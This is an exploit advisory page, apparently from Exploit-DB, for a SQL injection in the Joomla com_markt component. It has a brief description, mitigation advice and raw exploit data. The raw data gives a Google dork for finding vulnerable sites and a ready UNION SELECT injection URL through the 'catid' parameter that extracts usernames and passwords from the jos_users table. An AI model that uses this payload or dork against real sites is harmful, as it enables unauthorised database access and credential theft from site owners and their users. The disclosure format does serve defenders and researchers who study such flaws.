Joomla Component (com_markt) SQL Injection Vulnerability

vendor:

N/A

by:

CoBRa_21

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: N/A

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

Joomla Component (com_markt) SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable application. The request contains a malicious SQL query in the 'catid' parameter of the 'index.php' script. This can allow the attacker to access the sensitive information stored in the back-end database.

Mitigation:

Input validation should be used to prevent the exploitation of this vulnerability. The application should also be configured to use the least privileged user account to access the database.

Source

Exploit-DB raw data:

################################################################################################################
Joomla Component (com_markt) SQL Injection Vulnerability 

################################################################################################################
Author : CoBRa_21
Dork : inurl:com_markt
################################################################################################################
Sql Injection :
http://localhost/[path]/index.php?option=com_markt&page=show_category&catid=7+union+select+0,1,password,3,4,5,username,7,8+from+jos_users--
################################################################################################################
Thanks Cyber-Warrior.org  &  AKINCILAR 
################################################################################################################